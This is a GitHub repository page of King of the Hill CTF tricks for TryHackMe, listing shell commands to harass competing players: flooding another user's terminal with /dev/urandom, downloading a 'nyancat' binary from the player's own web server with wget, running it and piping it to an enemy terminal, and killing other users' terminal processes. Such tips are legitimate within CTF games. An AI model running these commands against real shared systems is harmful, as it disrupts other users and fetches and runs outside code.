-
Breaking pts by spamming urandom on thier terminal
| cat /dev/urandom > /dev/pts/$PTS -
NyanCat
| sudo python3 -m http.server 80 # On your local machine
| wget http://yourip/nyancat # On the KOTH machine
| chmod +x nyancat
| ./nyancat > /dev/$pts #replace $pts with pts of enemy -
Kill pts
| ps aux | grep ptsThen, look for a pts that is not yours and kill its process.
| kill -9 $PID #pid should be of a processs of enemy's pts
-
Notifications
You must be signed in to change notification settings - Fork 0
sakshm-aurora/koth_tricks
Folders and files
Name | Name | Last commit message | Last commit date | |
---|---|---|---|---|
Repository files navigation
About
tricks and tips i use in king of the hill ctf's on tryhackme
Topics
Resources
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published